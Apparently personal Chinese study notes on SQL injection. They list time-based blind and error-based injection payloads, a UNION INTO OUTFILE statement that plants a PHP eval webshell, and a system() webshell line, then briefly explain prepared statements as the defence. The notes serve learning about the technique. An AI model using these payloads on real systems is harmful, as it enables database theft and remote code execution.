sql盲注
1' or sleep(2) ->字符型
1 or sleep(2) ->数字型当确保前面条件为假时用or,为真时用and
因为or当条件一为真短路,and条件一为假时断路
必须确保第二条if可以运行
获取数据库名长度
1' or if((length(database()))=5,sleep(1),1) #
1' and if((length(database()))=5,sleep(1),1) #
1' or length(database())=5 and sleep(1) #
1' and length(database())=5 and sleep(1) # 获取数据库名
'1' or ord(substr(database(),1,1))>5 and sleep(1) #
'1' or if(ascii(substr(database(),1,1))>5,sleep(1),1) --
-- 正确语句
-- 1' or if(length((select group_concat(table_name) from information_schema.`TABLES` where table_schema = 'first'))>1,sleep(1),1);
select * from first.c where id = '1' or if(length((select group_concat(table_name)
from information_schema.`TABLES` where table_schema = 'first'))>1,sleep(1),1);
-- 错误语句
-- 1' or if(length(group_concat(table_name))>1,sleep(1),1) from information_schema.`TABLES` where table_schema = 'first';
select * from first.c where id = '1' or if(length(group_concat(table_name))>1,sleep(1),1)
from information_schema.`TABLES` where table_schema = 'first';sql注入RCE
select * from heroes where id=10 union select 1,2,3,'<?php eval($_POST[tedu])?>' into outfile '/var/www/html/images/jjj.php';
# 通过get请求或得shell
<?php system($_GET['TEDU']);?>语法补充
# 计数
count()
# 随机数
rand()
# 向下取整
floor()
# 根据x分组
group by x
# 检查xpath语法,如果错误就报错
extractvalue()报错注入
# 现版本已修复
select count(*),concat((select database()),FLOOR(RAND(0)*2))x from information_schema.`tables` group by x;
select extractvalue(1,concat(0x7e,(select database())));
sql预处理
原理将命令部分和数据部分
服务端会向将命令部分发给数据库,然后等待数据部分
将sql语句中的参数使用占位符代替
PREPARE select_content from 'select * from f1.student where age=?';
set @age="18' and 1=2";
EXECUTE select_content using @age;
20万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
